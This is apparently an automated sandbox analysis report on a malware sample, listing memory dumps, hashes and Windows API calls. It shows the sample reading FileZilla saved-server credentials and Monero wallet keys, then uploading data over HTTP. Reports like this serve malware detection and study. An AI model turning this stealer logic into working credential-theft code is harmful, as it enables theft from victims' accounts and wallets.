                      • Source File: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 7}?
                      • API String ID: 0-646764773
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: F]>^
                      • API String ID: 0-910754448
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7fb2f6e4e4a585a303e991684b85cb5e8e9c5b8622cd4d13f9d701142270e85f
                      • Instruction ID: 7895b84382350f8591d72f33b15bfbe4ebb14da760800765d5a6cbb2d4459670
                      • Opcode Fuzzy Hash: 7fb2f6e4e4a585a303e991684b85cb5e8e9c5b8622cd4d13f9d701142270e85f
                      • Instruction Fuzzy Hash: F561E7F3A0C6005FF3086E19EC9577ABBD6EBD4320F16853DEAC9C7384E97858018696
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ca9804a31a6f5043792a62023160e3cb5ee762ca93555227b0ee1a4762f59543
                      • Instruction ID: 4286bc5fbec7dcb74ca0d853060e35ae65d47e38e7faa7c90cf3aee4a10bca85
                      • Opcode Fuzzy Hash: ca9804a31a6f5043792a62023160e3cb5ee762ca93555227b0ee1a4762f59543
                      • Instruction Fuzzy Hash: 695103F3E082146BE3086A2DDC58776BBD6EBD4320F1B853DEA8897784ED394C0482D5
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6d8bdd30ab94b5a982908a6fd1b9484ba540772bd26fab1b443ea0687a3c6ce4
                      • Instruction ID: 909036501e14f540d86ec1c54a091c051d134534d1e03b97c815b33eb47763b5
                      • Opcode Fuzzy Hash: 6d8bdd30ab94b5a982908a6fd1b9484ba540772bd26fab1b443ea0687a3c6ce4
                      • Instruction Fuzzy Hash: 2C514DF3F081100BF3049A3DEC45766B6D6DBD4760F2A863DDA99D77C8E83D99058286
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8a330f9dce1866acb37ed565e5cbcd8dcd1334e5ebd8da93ee93cb7679eaf396
                      • Instruction ID: be4554db5b85627a6cbbb8b0b3e7d1040a4bd7565d614b4f9316976390dcb2ab
                      • Opcode Fuzzy Hash: 8a330f9dce1866acb37ed565e5cbcd8dcd1334e5ebd8da93ee93cb7679eaf396
                      • Instruction Fuzzy Hash: 394138B3A082204FE3046E7DED997BBBBDAEF94220F1A453DDAC5C3744E93459048696
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EF8E0B
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EFA7E6
                        • Part of subcall function 00EE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EE99EC
                        • Part of subcall function 00EE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EE9A11
                        • Part of subcall function 00EE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EE9A31
                        • Part of subcall function 00EE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EE148F,00000000), ref: 00EE9A5A
                        • Part of subcall function 00EE99C0: LocalFree.KERNEL32(00EE148F), ref: 00EE9A90
                        • Part of subcall function 00EE99C0: CloseHandle.KERNEL32(000000FF), ref: 00EE9A9A
                        • Part of subcall function 00EF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EF8E52
                      • GetProcessHeap.KERNEL32(00000000,000F423F,00F00DBA,00F00DB7,00F00DB6,00F00DB3), ref: 00EF0362
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EF0369
                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 00EF0385
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F00DB2), ref: 00EF0393
                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 00EF03CF
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F00DB2), ref: 00EF03DD
                      • StrStrA.SHLWAPI(00000000,<User>), ref: 00EF0419
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F00DB2), ref: 00EF0427
                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00EF0463
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F00DB2), ref: 00EF0475
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F00DB2), ref: 00EF0502
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F00DB2), ref: 00EF051A
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F00DB2), ref: 00EF0532
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F00DB2), ref: 00EF054A
                      • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00EF0562
                      • lstrcat.KERNEL32(?,profile: null), ref: 00EF0571
                      • lstrcat.KERNEL32(?,url: ), ref: 00EF0580
                      • lstrcat.KERNEL32(?,00000000), ref: 00EF0593
                      • lstrcat.KERNEL32(?,00F01678), ref: 00EF05A2
                      • lstrcat.KERNEL32(?,00000000), ref: 00EF05B5
                      • lstrcat.KERNEL32(?,00F0167C), ref: 00EF05C4
                      • lstrcat.KERNEL32(?,login: ), ref: 00EF05D3
                      • lstrcat.KERNEL32(?,00000000), ref: 00EF05E6
                      • lstrcat.KERNEL32(?,00F01688), ref: 00EF05F5
                      • lstrcat.KERNEL32(?,password: ), ref: 00EF0604
                      • lstrcat.KERNEL32(?,00000000), ref: 00EF0617
                      • lstrcat.KERNEL32(?,00F01698), ref: 00EF0626
                      • lstrcat.KERNEL32(?,00F0169C), ref: 00EF0635
                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00F00DB2), ref: 00EF068E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                      • API String ID: 1942843190-555421843
                      • Opcode ID: 118f8292ffa8f8ed2aca0a894b025c84a15ecde462bd70498bcc3db6f3b19d58
                      • Instruction ID: 54851e02994953441d77c63dcb1c7ce37c099fe971bfdd81c7a15f96184e3840
                      • Opcode Fuzzy Hash: 118f8292ffa8f8ed2aca0a894b025c84a15ecde462bd70498bcc3db6f3b19d58
                      • Instruction Fuzzy Hash: 40D12FB190010CABCB18EFE0DD56EFE77B8AF54300F449428F216BB085DE75AA59DB61
                      APIs
                        • Part of subcall function 00EFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EFA7E6
                        • Part of subcall function 00EE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EE4839
                        • Part of subcall function 00EE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EE4849
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EE59F8
                      • StrCmpCA.SHLWAPI(?,0168E470), ref: 00EE5A13
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EE5B93
                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0168E400,00000000,?,0168CE08,00000000,?,00F01A1C), ref: 00EE5E71
                      • lstrlen.KERNEL32(00000000), ref: 00EE5E82
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00EE5E93
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EE5E9A
                      • lstrlen.KERNEL32(00000000), ref: 00EE5EAF
                      • lstrlen.KERNEL32(00000000), ref: 00EE5ED8
                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00EE5EF1
                      • lstrlen.KERNEL32(00000000,?,?), ref: 00EE5F1B
                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00EE5F2F
                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00EE5F4C
                      • InternetCloseHandle.WININET(00000000), ref: 00EE5FB0
                      • InternetCloseHandle.WININET(00000000), ref: 00EE5FBD
                      • HttpOpenRequestA.WININET(00000000,0168E4E0,?,0168DA40,00000000,00000000,00400100,00000000), ref: 00EE5BF8
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                      • InternetCloseHandle.WININET(00000000), ref: 00EE5FC7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                      • String ID: "$"$------$------$------
                      • API String ID: 874700897-2180234286
                      • Opcode ID: a1b4bb63a9095bce79157350dac17397e1d1430da514ed0c91bca7a3a5d570ca
                      • Instruction ID: a53479f7078d49fd8bdbfe97cc867f5871f803413e9c420d176afdd880410e94
                      • Opcode Fuzzy Hash: a1b4bb63a9095bce79157350dac17397e1d1430da514ed0c91bca7a3a5d570ca
                      • Instruction Fuzzy Hash: D0121FB282011CAACB19EBA0DC99FEE73B8BF54700F445179F20A76091DF706A49CF65
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                        • Part of subcall function 00EF8B60: GetSystemTime.KERNEL32(00F00E1A,0168C928,00F005AE,?,?,00EE13F9,?,0000001A,00F00E1A,00000000,?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EF8B86
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EECF83
                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00EED0C7
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EED0CE
                      • lstrcat.KERNEL32(?,00000000), ref: 00EED208
                      • lstrcat.KERNEL32(?,00F01478), ref: 00EED217
                      • lstrcat.KERNEL32(?,00000000), ref: 00EED22A
                      • lstrcat.KERNEL32(?,00F0147C), ref: 00EED239
                      • lstrcat.KERNEL32(?,00000000), ref: 00EED24C
                      • lstrcat.KERNEL32(?,00F01480), ref: 00EED25B
                      • lstrcat.KERNEL32(?,00000000), ref: 00EED26E
                      • lstrcat.KERNEL32(?,00F01484), ref: 00EED27D
                      • lstrcat.KERNEL32(?,00000000), ref: 00EED290
                      • lstrcat.KERNEL32(?,00F01488), ref: 00EED29F
                      • lstrcat.KERNEL32(?,00000000), ref: 00EED2B2
                      • lstrcat.KERNEL32(?,00F0148C), ref: 00EED2C1
                      • lstrcat.KERNEL32(?,00000000), ref: 00EED2D4
                      • lstrcat.KERNEL32(?,00F01490), ref: 00EED2E3
                        • Part of subcall function 00EFA820: lstrlen.KERNEL32(00EE4F05,?,?,00EE4F05,00F00DDE), ref: 00EFA82B
                        • Part of subcall function 00EFA820: lstrcpy.KERNEL32(00F00DDE,00000000), ref: 00EFA885
                      • lstrlen.KERNEL32(?), ref: 00EED32A
                      • lstrlen.KERNEL32(?), ref: 00EED339
                        • Part of subcall function 00EFAA70: StrCmpCA.SHLWAPI(016889E8,00EEA7A7,?,00EEA7A7,016889E8), ref: 00EFAA8F
                      • DeleteFileA.KERNEL32(00000000), ref: 00EED3B4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                      • String ID:
                      • API String ID: 1956182324-0
                      • Opcode ID: dfde74688a4bbeff4383e3ed943e80ffce8ab037cf64ec89404bef62deb7fcc3
                      • Instruction ID: 6c6a42aa33d5a396aa7fc28dfdd79c93a8b17a8dc25ded5118621c009ce0271b
                      • Opcode Fuzzy Hash: dfde74688a4bbeff4383e3ed943e80ffce8ab037cf64ec89404bef62deb7fcc3
                      • Instruction Fuzzy Hash: F3E144B1810108ABCB18EFA0DD55EFE73B8BF54301F145078F606B7095DE75AA59CB62
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0168C738,00000000,?,00F0144C,00000000,?,?), ref: 00EECA6C
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00EECA89
                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00EECA95
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EECAA8
                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00EECAD9
                      • StrStrA.SHLWAPI(?,0168C798,00F00B52), ref: 00EECAF7
                      • StrStrA.SHLWAPI(00000000,0168C6D8), ref: 00EECB1E
                      • StrStrA.SHLWAPI(?,0168D500,00000000,?,00F01458,00000000,?,00000000,00000000,?,01688B68,00000000,?,00F01454,00000000,?), ref: 00EECCA2
                      • StrStrA.SHLWAPI(00000000,0168D560), ref: 00EECCB9
                        • Part of subcall function 00EEC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00EEC871
                        • Part of subcall function 00EEC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00EEC87C
                      • StrStrA.SHLWAPI(?,0168D560,00000000,?,00F0145C,00000000,?,00000000,016889C8), ref: 00EECD5A
                      • StrStrA.SHLWAPI(00000000,016888E8), ref: 00EECD71
                        • Part of subcall function 00EEC820: lstrcat.KERNEL32(?,00F00B46), ref: 00EEC943
                        • Part of subcall function 00EEC820: lstrcat.KERNEL32(?,00F00B47), ref: 00EEC957
                        • Part of subcall function 00EEC820: lstrcat.KERNEL32(?,00F00B4E), ref: 00EEC978
                      • lstrlen.KERNEL32(00000000), ref: 00EECE44
                      • CloseHandle.KERNEL32(00000000), ref: 00EECE9C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      Similarity
                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                      • String ID:
                      • API String ID: 3744635739-3916222277
                      • Opcode ID: 7a8ede868600eee862778e03682a5b7470c61edd26432a33d519d3d5e861663a
